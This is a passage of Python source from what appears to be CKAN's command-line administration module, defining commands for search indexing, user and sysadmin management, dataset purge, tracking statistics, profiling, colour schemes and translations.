Session.execute("update resource set url_type = 'upload'"
"where id = :id", {'id': id})
Session.execute("update resource_revision set url_type = 'upload'"
"where id = :id and "
"revision_id = :revision_id",
{'id': id, 'revision_id': revision_id})
Session.commit()
print("Saved url %s" % url)
def version(self):
from ckan.model import Session
print(Session.execute('select version from '
'migrate_version;').fetchall())
class SearchIndexCommand(CkanCommand):
'''Creates a search index for all datasets
Usage:
search-index [-i] [-o] [-r] [-e] [-q] rebuild [dataset_name] - reindex dataset_name if given, if not then rebuild
full search index (all datasets)
search-index rebuild_fast - reindex using multiprocessing using all cores.
This acts in the same way as rubuild -r [EXPERIMENTAL]
search-index check - checks for datasets not indexed
search-index show DATASET_NAME - shows index of a dataset
search-index clear [dataset_name] - clears the search index for the provided dataset or
for the whole ckan instance
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def __init__(self, name):
super(SearchIndexCommand, self).__init__(name)
self.parser.add_option('-i', '--force', dest='force',
action='store_true', default=False,
help='Ignore exceptions when rebuilding the index')
self.parser.add_option('-o', '--only-missing', dest='only_missing',
action='store_true', default=False,
help='Index non indexed datasets only')
self.parser.add_option('-r', '--refresh', dest='refresh',
action='store_true', default=False,
help='Refresh current index (does not clear the existing one)')
self.parser.add_option('-q', '--quiet', dest='quiet',
action='store_true', default=False,
help='Do not output index rebuild progress')
self.parser.add_option('-e', '--commit-each', dest='commit_each',
action='store_true', default=False, help=
'''Perform a commit after indexing each dataset. This ensures that changes are
immediately available on the search, but slows significantly the process.
Default is false.''')
def command(self):
if not self.args:
# default to printing help
print(self.usage)
return
cmd = self.args[0]
# Do not run load_config yet
if cmd == 'rebuild_fast':
self.rebuild_fast()
return
self._load_config()
if cmd == 'rebuild':
self.rebuild()
elif cmd == 'check':
self.check()
elif cmd == 'show':
self.show()
elif cmd == 'clear':
self.clear()
else:
print('Command %s not recognized' % cmd)
def rebuild(self):
from ckan.lib.search import rebuild, commit
# BY default we don't commit after each request to Solr, as it is
# a really heavy operation and slows things a lot
if len(self.args) > 1:
rebuild(self.args[1])
else:
rebuild(only_missing=self.options.only_missing,
force=self.options.force,
refresh=self.options.refresh,
defer_commit=(not self.options.commit_each),
quiet=self.options.quiet)
if not self.options.commit_each:
commit()
def check(self):
from ckan.lib.search import check
check()
def show(self):
from ckan.lib.search import show
if not len(self.args) == 2:
print('Missing parameter: dataset-name')
return
index = show(self.args[1])
pprint(index)
def clear(self):
from ckan.lib.search import clear, clear_all
package_id = self.args[1] if len(self.args) > 1 else None
if not package_id:
clear_all()
else:
clear(package_id)
def rebuild_fast(self):
### Get out config but without starting pylons environment ####
conf = _get_config(self.options.config)
### Get ids using own engine, otherwise multiprocess will balk
db_url = conf['sqlalchemy.url']
engine = sa.create_engine(db_url)
package_ids = []
result = engine.execute("select id from package where state = 'active';")
for row in result:
package_ids.append(row[0])
def start(ids):
## load actual enviroment for each subprocess, so each have thier own
## sa session
self._load_config()
from ckan.lib.search import rebuild, commit
rebuild(package_ids=ids)
commit()
def chunks(l, n):
""" Yield n successive chunks from l.
"""
newn = int(len(l) / n)
for i in xrange(0, n-1):
yield l[i*newn:i*newn+newn]
yield l[n*newn-newn:]
processes = []
for chunk in chunks(package_ids, mp.cpu_count()):
process = mp.Process(target=start, args=(chunk,))
processes.append(process)
process.daemon = True
process.start()
for process in processes:
process.join()
class Notification(CkanCommand):
'''Send out modification notifications.
In "replay" mode, an update signal is sent for each dataset in the database.
Usage:
notify replay - send out modification signals
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
from ckan.model import Session, Package, DomainObjectOperation
from ckan.model.modification import DomainObjectModificationExtension
if not self.args:
# default to run
cmd = 'replay'
else:
cmd = self.args[0]
if cmd == 'replay':
dome = DomainObjectModificationExtension()
for package in Session.query(Package):
dome.notify(package, DomainObjectOperation.changed)
else:
print('Command %s not recognized' % cmd)
class RDFExport(CkanCommand):
'''Export active datasets as RDF
This command dumps out all currently active datasets as RDF into the
specified folder.
Usage:
paster rdf-export /path/to/store/output
'''
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
self._load_config()
if not self.args:
# default to run
print(RDFExport.__doc__)
else:
self.export_datasets(self.args[0])
def export_datasets(self, out_folder):
'''
Export datasets as RDF to an output folder.
'''
from ckan.common import config
import ckan.model as model
import ckan.logic as logic
import ckan.lib.helpers as h
# Create output folder if not exists
if not os.path.isdir(out_folder):
os.makedirs(out_folder)
fetch_url = config['ckan.site_url']
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
dataset_names = logic.get_action('package_list')(context, {})
for dataset_name in dataset_names:
dd = logic.get_action('package_show')(context, {'id': dataset_name})
if not dd['state'] == 'active':
continue
url = h.url_for(controller='package', action='read', id=dd['name'])
url = urljoin(fetch_url, url[1:]) + '.rdf'
try:
fname = os.path.join(out_folder, dd['name']) + ".rdf"
try:
r = urlopen(url).read()
except HTTPError as e:
if e.code == 404:
error('Please install ckanext-dcat and enable the ' +
'`dcat` plugin to use the RDF serializations')
with open(fname, 'wb') as f:
f.write(r)
except IOError as ioe:
sys.stderr.write(str(ioe) + "\n")
class Sysadmin(CkanCommand):
'''Gives sysadmin rights to a named user
Usage:
sysadmin - lists sysadmins
sysadmin list - lists sysadmins
sysadmin add USERNAME - make an existing user into a sysadmin
sysadmin add USERNAME [FIELD1=VALUE1 FIELD2=VALUE2 ...]
- creates a new user that is a sysadmin
(prompts for password and email if not
supplied).
Field can be: apikey
password
email
sysadmin remove USERNAME - removes user from sysadmins
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 0
def command(self):
self._load_config()
cmd = self.args[0] if self.args else None
if cmd is None or cmd == 'list':
self.list()
elif cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
else:
print('Command %s not recognized' % cmd)
def list(self):
import ckan.model as model
print('Sysadmins:')
sysadmins = model.Session.query(model.User).filter_by(sysadmin=True,
state='active')
print('count = %i' % sysadmins.count())
for sysadmin in sysadmins:
print('%s name=%s email=%s id=%s' % (
sysadmin.__class__.__name__,
sysadmin.name,
sysadmin.email,
sysadmin.id))
def add(self):
import ckan.model as model
if len(self.args) < 2:
print('Need name of the user to be made sysadmin.')
return
username = self.args[1]
user = model.User.by_name(text_type(username))
if not user:
print('User "%s" not found' % username)
makeuser = input('Create new user: %s? [y/n]' % username)
if makeuser == 'y':
user_add(self.args[1:])
user = model.User.by_name(text_type(username))
else:
print('Exiting ...')
return
user.sysadmin = True
model.Session.add(user)
model.repo.commit_and_remove()
print('Added %s as sysadmin' % username)
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print('Need name of the user to be made sysadmin.')
return
username = self.args[1]
user = model.User.by_name(text_type(username))
if not user:
print('Error: user "%s" not found!' % username)
return
user.sysadmin = False
model.repo.commit_and_remove()
class UserCmd(CkanCommand):
'''Manage users
Usage:
user - lists users
user list - lists users
user USERNAME - shows user properties
user add USERNAME [FIELD1=VALUE1 FIELD2=VALUE2 ...]
- add a user (prompts for email and
password if not supplied).
Field can be: apikey
password
email
user setpass USERNAME - set user password (prompts)
user remove USERNAME - removes user from users
user search QUERY - searches for a user name
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 0
def command(self):
self._load_config()
if not self.args:
self.list()
else:
cmd = self.args[0]
if cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
elif cmd == 'search':
self.search()
elif cmd == 'setpass':
self.setpass()
elif cmd == 'list':
self.list()
else:
self.show()
def get_user_str(self, user):
user_str = 'name=%s' % user.name
if user.name != user.display_name:
user_str += ' display=%s' % user.display_name
return user_str
def list(self):
import ckan.model as model
print('Users:')
users = model.Session.query(model.User).filter_by(state='active')
print('count = %i' % users.count())
for user in users:
print(self.get_user_str(user))
def show(self):
import ckan.model as model
username = self.args[0]
user = model.User.get(text_type(username))
print('User: \n', user)
def setpass(self):
import ckan.model as model
if len(self.args) < 2:
print('Need name of the user.')
return
username = self.args[1]
user = model.User.get(username)
print('Editing user: %r' % user.name)
password = self.password_prompt()
user.password = password
model.repo.commit_and_remove()
print('Done')
def search(self):
import ckan.model as model
if len(self.args) < 2:
print('Need user name query string.')
return
query_str = self.args[1]
query = model.User.search(query_str)
print('%i users matching %r:' % (query.count(), query_str))
for user in query.all():
print(self.get_user_str(user))
@classmethod
def password_prompt(cls):
import getpass
password1 = None
while not password1:
password1 = getpass.getpass('Password: ')
password2 = getpass.getpass('Confirm password: ')
if password1 != password2:
error('Passwords do not match')
return password1
def add(self):
user_add(self.args[1:])
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print('Need name of the user.')
return
username = self.args[1]
p.toolkit.get_action('user_delete')(
{'model': model, 'ignore_auth': True},
{'id': username})
print('Deleted user: %s' % username)
class DatasetCmd(CkanCommand):
'''Manage datasets
Usage:
dataset DATASET_NAME|ID - shows dataset properties
dataset show DATASET_NAME|ID - shows dataset properties
dataset list - lists datasets
dataset delete [DATASET_NAME|ID] - changes dataset state to 'deleted'
dataset purge [DATASET_NAME|ID] - removes dataset from db entirely
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 0
def command(self):
self._load_config()
if not self.args:
print(self.usage)
else:
cmd = self.args[0]
if cmd == 'delete':
self.delete(self.args[1])
elif cmd == 'purge':
self.purge(self.args[1])
elif cmd == 'list':
self.list()
elif cmd == 'show':
self.show(self.args[1])
else:
self.show(self.args[0])
def list(self):
import ckan.model as model
print('Datasets:')
datasets = model.Session.query(model.Package)
print('count = %i' % datasets.count())
for dataset in datasets:
state = ('(%s)' % dataset.state) if dataset.state != 'active' else ''
print('%s %s %s' % (dataset.id, dataset.name, state))
def _get_dataset(self, dataset_ref):
import ckan.model as model
dataset = model.Package.get(text_type(dataset_ref))
assert dataset, 'Could not find dataset matching reference: %r' % dataset_ref
return dataset
def show(self, dataset_ref):
import pprint
dataset = self._get_dataset(dataset_ref)
pprint.pprint(dataset.as_dict())
def delete(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
old_state = dataset.state
rev = model.repo.new_revision()
dataset.delete()
model.repo.commit_and_remove()
dataset = self._get_dataset(dataset_ref)
print('%s %s -> %s' % (dataset.name, old_state, dataset.state))
def purge(self, dataset_ref):
import ckan.logic as logic
dataset = self._get_dataset(dataset_ref)
name = dataset.name
site_user = logic.get_action('get_site_user')({'ignore_auth': True}, {})
context = {'user': site_user['name']}
logic.get_action('dataset_purge')(
context, {'id': dataset_ref})
print('%s purged' % name)
class Ratings(CkanCommand):
'''Manage the ratings stored in the db
Usage:
ratings count - counts ratings
ratings clean - remove all ratings
ratings clean-anonymous - remove only anonymous ratings
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0]
if cmd == 'count':
self.count()
elif cmd == 'clean':
self.clean()
elif cmd == 'clean-anonymous':
self.clean(user_ratings=False)
else:
print('Command %s not recognized' % cmd)
def count(self):
import ckan.model as model
q = model.Session.query(model.Rating)
print("%i ratings" % q.count())
q = q.filter(model.Rating.user_id is None)
print("of which %i are anonymous ratings" % q.count())
def clean(self, user_ratings=True):
import ckan.model as model
q = model.Session.query(model.Rating)
print("%i ratings" % q.count())
if not user_ratings:
q = q.filter(model.Rating.user_id is None)
print("of which %i are anonymous ratings" % q.count())
ratings = q.all()
for rating in ratings:
rating.purge()
model.repo.commit_and_remove()
## Used by the Tracking class
_ViewCount = collections.namedtuple("ViewCount", "id name count")
class Tracking(CkanCommand):
'''Update tracking statistics
Usage:
tracking update [start_date] - update tracking stats
tracking export FILE [start_date] - export tracking stats to a csv file
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
engine = model.meta.engine
cmd = self.args[0]
if cmd == 'update':
start_date = self.args[1] if len(self.args) > 1 else None
self.update_all(engine, start_date)
elif cmd == 'export':
if len(self.args) <= 1:
error(self.__class__.__doc__)
output_file = self.args[1]
start_date = self.args[2] if len(self.args) > 2 else None
self.update_all(engine, start_date)
self.export_tracking(engine, output_file)
else:
error(self.__class__.__doc__)
def update_all(self, engine, start_date=None):
if start_date:
start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d')
else:
# No date given. See when we last have data for and get data
# from 2 days before then in case new data is available.
# If no date here then use 2011-01-01 as the start date
sql = '''SELECT tracking_date from tracking_summary
ORDER BY tracking_date DESC LIMIT 1;'''
result = engine.execute(sql).fetchall()
if result:
start_date = result[0]['tracking_date']
start_date += datetime.timedelta(-2)
# convert date to datetime
combine = datetime.datetime.combine
start_date = combine(start_date, datetime.time(0))
else:
start_date = datetime.datetime(2011, 1, 1)
start_date_solrsync = start_date
end_date = datetime.datetime.now()
while start_date < end_date:
stop_date = start_date + datetime.timedelta(1)
self.update_tracking(engine, start_date)
print('tracking updated for %s' % start_date)
start_date = stop_date
self.update_tracking_solr(engine, start_date_solrsync)
def _total_views(self, engine):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql).fetchall()]
def _recent_views(self, engine, measure_from):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
WHERE s.tracking_date >= %(measure_from)s
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql, measure_from=str(measure_from)).fetchall()]
def export_tracking(self, engine, output_filename):
'''Write tracking summary to a csv file.'''
HEADINGS = [
"dataset id",
"dataset name",
"total views",
"recent views (last 2 weeks)",
]
measure_from = datetime.date.today() - datetime.timedelta(days=14)
recent_views = self._recent_views(engine, measure_from)
total_views = self._total_views(engine)
with open(output_filename, 'w') as fh:
f_out = csv.writer(fh)
f_out.writerow(HEADINGS)
recent_views_for_id = dict((r.id, r.count) for r in recent_views)
f_out.writerows([(r.id,
r.name,
r.count,
recent_views_for_id.get(r.id, 0))
for r in total_views])
def update_tracking(self, engine, summary_date):
PACKAGE_URL = '/dataset/'
# clear out existing data before adding new
sql = '''DELETE FROM tracking_summary
WHERE tracking_date='%s'; ''' % summary_date
engine.execute(sql)
sql = '''SELECT DISTINCT url, user_key,
CAST(access_timestamp AS Date) AS tracking_date,
tracking_type INTO tracking_tmp
FROM tracking_raw
WHERE CAST(access_timestamp as Date)=%s;
INSERT INTO tracking_summary
(url, count, tracking_date, tracking_type)
SELECT url, count(user_key), tracking_date, tracking_type
FROM tracking_tmp
GROUP BY url, tracking_date, tracking_type;
DROP TABLE tracking_tmp;
COMMIT;'''
engine.execute(sql, summary_date)
# get ids for dataset urls
sql = '''UPDATE tracking_summary t
SET package_id = COALESCE(
(SELECT id FROM package p
WHERE p.name = regexp_replace(' ' || t.url, '^[ ]{1}(/\w{2}){0,1}' || %s, ''))
,'~~not~found~~')
WHERE t.package_id IS NULL
AND tracking_type = 'page';'''
engine.execute(sql, PACKAGE_URL)
# update summary totals for resources
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'resource';'''
engine.execute(sql)
# update summary totals for pages
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'page'
AND t1.package_id IS NOT NULL
AND t1.package_id != '~~not~found~~';'''
engine.execute(sql)
def update_tracking_solr(self, engine, start_date):
sql = '''SELECT package_id FROM tracking_summary
where package_id!='~~not~found~~'
and tracking_date >= %s;'''
results = engine.execute(sql, start_date)
package_ids = set()
for row in results:
package_ids.add(row['package_id'])
total = len(package_ids)
not_found = 0
print('%i package index%s to be rebuilt starting from %s' % (total, '' if total < 2 else 'es', start_date))
from ckan.lib.search import rebuild
for package_id in package_ids:
try:
rebuild(package_id)
except logic.NotFound:
print("Error: package %s not found." % (package_id))
not_found += 1
except KeyboardInterrupt:
print("Stopped.")
return
except:
raise
print('search index rebuilding done.' + (' %i not found.' % (not_found) if not_found else ""))
class PluginInfo(CkanCommand):
'''Provide info on installed plugins.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 0
min_args = 0
def command(self):
self.get_info()
def get_info(self):
''' print info about current plugins from the .ini file'''
import ckan.plugins as p
self._load_config()
interfaces = {}
plugins = {}
for name in dir(p):
item = getattr(p, name)
try:
if issubclass(item, p.Interface):
interfaces[item] = {'class': item}
except TypeError:
pass
for interface in interfaces:
for plugin in p.PluginImplementations(interface):
name = plugin.name
if name not in plugins:
plugins[name] = {'doc': plugin.__doc__,
'class': plugin,
'implements': []}
plugins[name]['implements'].append(interface.__name__)
for plugin in plugins:
p = plugins[plugin]
print(plugin + ':')
print('-' * (len(plugin) + 1))
if p['doc']:
print(p['doc'])
print('Implements:')
for i in p['implements']:
extra = None
if i == 'ITemplateHelpers':
extra = self.template_helpers(p['class'])
if i == 'IActions':
extra = self.actions(p['class'])
print(' %s' % i)
if extra:
print(extra)
print
def actions(self, cls):
''' Return readable action function info. '''
actions = cls.get_actions()
return self.function_info(actions)
def template_helpers(self, cls):
''' Return readable helper function info. '''
helpers = cls.get_helpers()
return self.function_info(helpers)
def function_info(self, functions):
''' Take a dict of functions and output readable info '''
import inspect
output = []
for function_name in functions:
fn = functions[function_name]
args_info = inspect.getargspec(fn)
params = args_info.args
num_params = len(params)
if args_info.varargs:
params.append('*' + args_info.varargs)
if args_info.keywords:
params.append('**' + args_info.keywords)
if args_info.defaults:
offset = num_params - len(args_info.defaults)
for i, v in enumerate(args_info.defaults):
params[i + offset] = params[i + offset] + '=' + repr(v)
# is this a classmethod if so remove the first parameter
if inspect.ismethod(fn) and inspect.isclass(fn.__self__):
params = params[1:]
params = ', '.join(params)
output.append(' %s(%s)' % (function_name, params))
# doc string
if fn.__doc__:
bits = fn.__doc__.split('\n')
for bit in bits:
output.append(' %s' % bit)
return ('\n').join(output)
class CreateTestDataCommand(CkanCommand):
'''Create test data in the database.
Tests can also delete the created objects easily with the delete() method.
create-test-data - annakarenina and warandpeace
create-test-data search - realistic data to test search
create-test-data gov - government style data
create-test-data family - package relationships data
create-test-data user - create a user 'tester' with api key 'tester'
create-test-data translations - annakarenina, warandpeace, and some test
translations of terms
create-test-data vocabs - annakerenina, warandpeace, and some test
vocabularies
create-test-data hierarchy - hierarchy of groups
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
from ckan import plugins
from create_test_data import CreateTestData
if self.args:
cmd = self.args[0]
else:
cmd = 'basic'
if self.verbose:
print('Creating %s test data' % cmd)
if cmd == 'basic':
CreateTestData.create_basic_test_data()
elif cmd == 'user':
CreateTestData.create_test_user()
print('Created user %r with password %r and apikey %r' %
('tester', 'tester', 'tester'))
elif cmd == 'search':
CreateTestData.create_search_test_data()
elif cmd == 'gov':
CreateTestData.create_gov_test_data()
elif cmd == 'family':
CreateTestData.create_family_test_data()
elif cmd == 'translations':
CreateTestData.create_translations_test_data()
elif cmd == 'vocabs':
CreateTestData.create_vocabs_test_data()
elif cmd == 'hierarchy':
CreateTestData.create_group_hierarchy_test_data()
else:
print('Command %s not recognized' % cmd)
raise NotImplementedError
if self.verbose:
print('Creating %s test data: Complete!' % cmd)
class Profile(CkanCommand):
'''Code speed profiler
Provide a ckan url and it will make the request and record
how long each function call took in a file that can be read
by pstats.Stats (command-line) or runsnakerun (gui).
Usage:
profile URL [username]
e.g. profile /data/search
The result is saved in profile.data.search
To view the profile in runsnakerun:
runsnakerun ckan.data.search.profile
You may need to install python module: cProfile
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 1
def _load_config_into_test_app(self):
from paste.deploy import loadapp
import paste.fixture
if not self.options.config:
msg = 'No config file supplied'
raise self.BadCommand(msg)
self.filename = os.path.abspath(self.options.config)
if not os.path.exists(self.filename):
raise AssertionError('Config filename %r does not exist.' % self.filename)
fileConfig(self.filename)
wsgiapp = loadapp('config:' + self.filename)
self.app = paste.fixture.TestApp(wsgiapp)
def command(self):
self._load_config_into_test_app()
import paste.fixture
import cProfile
import re
url = self.args[0]
if self.args[1:]:
user = self.args[1]
else:
user = 'visitor'
def profile_url(url):
try:
res = self.app.get(url, status=[200],
extra_environ={'REMOTE_USER': user})
except paste.fixture.AppError:
print('App error: ', url.strip())
except KeyboardInterrupt:
raise
except Exception:
error(traceback.format_exc())
output_filename = 'ckan%s.profile' % re.sub('[/?]', '.', url.replace('/', '.'))
profile_command = "profile_url('%s')" % url
cProfile.runctx(profile_command, globals(), locals(), filename=output_filename)
import pstats
stats = pstats.Stats(output_filename)
stats.sort_stats('cumulative')
stats.print_stats(0.1) # show only top 10% of lines
print('Only top 10% of lines shown')
print('Written profile to: %s' % output_filename)
class CreateColorSchemeCommand(CkanCommand):
'''Create or remove a color scheme.
After running this, you'll need to regenerate the css files. See paster's less command for details.
color - creates a random color scheme
color clear - clears any color scheme
color <'HEX'> - uses as base color eg '#ff00ff' must be quoted.
color <VALUE> - a float between 0.0 and 1.0 used as base hue
color <COLOR_NAME> - html color name used for base color eg lightblue
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
rules = [
'@layoutLinkColor',
'@mastheadBackgroundColor',
'@btnPrimaryBackground',
'@btnPrimaryBackgroundHighlight',
]
# list of predefined colors
color_list = {
'aliceblue': '#f0fff8',
'antiquewhite': '#faebd7',
'aqua': '#00ffff',
'aquamarine': '#7fffd4',
'azure': '#f0ffff',
'beige': '#f5f5dc',
'bisque': '#ffe4c4',
'black': '#000000',
'blanchedalmond': '#ffebcd',
'blue': '#0000ff',
'blueviolet': '#8a2be2',
'brown': '#a52a2a',
'burlywood': '#deb887',
'cadetblue': '#5f9ea0',
'chartreuse': '#7fff00',
'chocolate': '#d2691e',
'coral': '#ff7f50',
'cornflowerblue': '#6495ed',
'cornsilk': '#fff8dc',
'crimson': '#dc143c',
'cyan': '#00ffff',
'darkblue': '#00008b',
'darkcyan': '#008b8b',
'darkgoldenrod': '#b8860b',
'darkgray': '#a9a9a9',
'darkgrey': '#a9a9a9',
'darkgreen': '#006400',
'darkkhaki': '#bdb76b',
'darkmagenta': '#8b008b',
'darkolivegreen': '#556b2f',
'darkorange': '#ff8c00',
'darkorchid': '#9932cc',
'darkred': '#8b0000',
'darksalmon': '#e9967a',
'darkseagreen': '#8fbc8f',
'darkslateblue': '#483d8b',
'darkslategray': '#2f4f4f',
'darkslategrey': '#2f4f4f',
'darkturquoise': '#00ced1',
'darkviolet': '#9400d3',
'deeppink': '#ff1493',
'deepskyblue': '#00bfff',
'dimgray': '#696969',
'dimgrey': '#696969',
'dodgerblue': '#1e90ff',
'firebrick': '#b22222',
'floralwhite': '#fffaf0',
'forestgreen': '#228b22',
'fuchsia': '#ff00ff',
'gainsboro': '#dcdcdc',
'ghostwhite': '#f8f8ff',
'gold': '#ffd700',
'goldenrod': '#daa520',
'gray': '#808080',
'grey': '#808080',
'green': '#008000',
'greenyellow': '#adff2f',
'honeydew': '#f0fff0',
'hotpink': '#ff69b4',
'indianred ': '#cd5c5c',
'indigo ': '#4b0082',
'ivory': '#fffff0',
'khaki': '#f0e68c',
'lavender': '#e6e6fa',
'lavenderblush': '#fff0f5',
'lawngreen': '#7cfc00',
'lemonchiffon': '#fffacd',
'lightblue': '#add8e6',
'lightcoral': '#f08080',
'lightcyan': '#e0ffff',
'lightgoldenrodyellow': '#fafad2',
'lightgray': '#d3d3d3',
'lightgrey': '#d3d3d3',
'lightgreen': '#90ee90',
'lightpink': '#ffb6c1',
'lightsalmon': '#ffa07a',
'lightseagreen': '#20b2aa',
'lightskyblue': '#87cefa',
'lightslategray': '#778899',
'lightslategrey': '#778899',
'lightsteelblue': '#b0c4de',
'lightyellow': '#ffffe0',
'lime': '#00ff00',
'limegreen': '#32cd32',
'linen': '#faf0e6',
'magenta': '#ff00ff',
'maroon': '#800000',
'mediumaquamarine': '#66cdaa',
'mediumblue': '#0000cd',
'mediumorchid': '#ba55d3',
'mediumpurple': '#9370d8',
'mediumseagreen': '#3cb371',
'mediumslateblue': '#7b68ee',
'mediumspringgreen': '#00fa9a',
'mediumturquoise': '#48d1cc',
'mediumvioletred': '#c71585',
'midnightblue': '#191970',
'mintcream': '#f5fffa',
'mistyrose': '#ffe4e1',
'moccasin': '#ffe4b5',
'navajowhite': '#ffdead',
'navy': '#000080',
'oldlace': '#fdf5e6',
'olive': '#808000',
'olivedrab': '#6b8e23',
'orange': '#ffa500',
'orangered': '#ff4500',
'orchid': '#da70d6',
'palegoldenrod': '#eee8aa',
'palegreen': '#98fb98',
'paleturquoise': '#afeeee',
'palevioletred': '#d87093',
'papayawhip': '#ffefd5',
'peachpuff': '#ffdab9',
'peru': '#cd853f',
'pink': '#ffc0cb',
'plum': '#dda0dd',
'powderblue': '#b0e0e6',
'purple': '#800080',
'red': '#ff0000',
'rosybrown': '#bc8f8f',
'royalblue': '#4169e1',
'saddlebrown': '#8b4513',
'salmon': '#fa8072',
'sandybrown': '#f4a460',
'seagreen': '#2e8b57',
'seashell': '#fff5ee',
'sienna': '#a0522d',
'silver': '#c0c0c0',
'skyblue': '#87ceeb',
'slateblue': '#6a5acd',
'slategray': '#708090',
'slategrey': '#708090',
'snow': '#fffafa',
'springgreen': '#00ff7f',
'steelblue': '#4682b4',
'tan': '#d2b48c',
'teal': '#008080',
'thistle': '#d8bfd8',
'tomato': '#ff6347',
'turquoise': '#40e0d0',
'violet': '#ee82ee',
'wheat': '#f5deb3',
'white': '#ffffff',
'whitesmoke': '#f5f5f5',
'yellow': '#ffff00',
'yellowgreen': '#9acd32',
}
def create_colors(self, hue, num_colors=5, saturation=None, lightness=None):
if saturation is None:
saturation = 0.9
if lightness is None:
lightness = 40
else:
lightness *= 100
import math
saturation -= math.trunc(saturation)
print(hue, saturation)
import colorsys
''' Create n related colours '''
colors = []
for i in xrange(num_colors):
ix = i * (1.0/num_colors)
_lightness = (lightness + (ix * 40))/100.
if _lightness > 1.0:
_lightness = 1.0
color = colorsys.hls_to_rgb(hue, _lightness, saturation)
hex_color = '#'
for part in color:
hex_color += '%02x' % int(part * 255)
# check and remove any bad values
if not re.match('^\#[0-9a-f]{6}$', hex_color):
hex_color = '#FFFFFF'
colors.append(hex_color)
return colors
def command(self):
hue = None
saturation = None
lightness = None
public = config.get(u'ckan.base_public_folder')
path = os.path.dirname(__file__)
path = os.path.join(path, '..', public, 'base', 'less', 'custom.less')
if self.args:
arg = self.args[0]
rgb = None
if arg == 'clear':
os.remove(path)
print('custom colors removed.')
elif arg.startswith('#'):
color = arg[1:]
if len(color) == 3:
rgb = [int(x, 16) * 16 for x in color]
elif len(color) == 6:
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
print('ERROR: invalid color')
elif arg.lower() in self.color_list:
color = self.color_list[arg.lower()][1:]
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
try:
hue = float(self.args[0])
except ValueError:
print('ERROR argument `%s` not recognised' % arg)
if rgb:
import colorsys
hue, lightness, saturation = colorsys.rgb_to_hls(*rgb)
lightness = lightness / 340
# deal with greys
if not (hue == 0.0 and saturation == 0.0):
saturation = None
else:
import random
hue = random.random()
if hue is not None:
f = open(path, 'w')
colors = self.create_colors(hue, saturation=saturation, lightness=lightness)
for i in xrange(len(self.rules)):
f.write('%s: %s;\n' % (self.rules[i], colors[i]))
print('%s: %s;\n' % (self.rules[i], colors[i]))
f.close
print('Color scheme has been created.')
print('Make sure less is run for changes to take effect.')
class TranslationsCommand(CkanCommand):
'''Translation helper functions
trans js - generate the javascript translations
trans mangle - mangle the zh_TW translations for testing
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
from ckan.common import config
from ckan.lib.i18n import build_js_translations
ckan_path = os.path.join(os.path.dirname(__file__), '..')
self.i18n_path = config.get('ckan.i18n_directory',
os.path.join(ckan_path, 'i18n'))
command = self.args[0]
if command == 'mangle':
self.mangle_po()
elif command == 'js':
build_js_translations()
else:
print('command not recognised')
def mangle_po(self):
''' This will mangle the zh_TW translations for translation coverage
testing.
NOTE: This will destroy the current translations fot zh_TW
'''
import polib
pot_path = os.path.join(self.i18n_path, 'ckan.pot')
po = polib.pofile(pot_path)
# we don't want to mangle the following items in strings
# %(...)s %s %0.3f %1$s %2$0.3f [1:...] {...} etc
# sprintf bit after %
spf_reg_ex = "\+?(0|'.)?-?\d*(.\d*)?[\%bcdeufosxX]"
extract_reg_ex = '(\%\([^\)]*\)' + spf_reg_ex + \
'|\[\d*\:[^\]]*\]' + \
'|\{[^\}]*\}' + \
'|<[^>}]*>' + \
'|\%((\d)*\$)?' + spf_reg_ex + ')'
for entry in po:
msg = entry.msgid.encode('utf-8')
matches = re.finditer(extract_reg_ex, msg)
length = len(msg)
position = 0
translation = u''
for match in matches:
translation += '-' * (match.start() - position)
position = match.end()
translation += match.group(0)
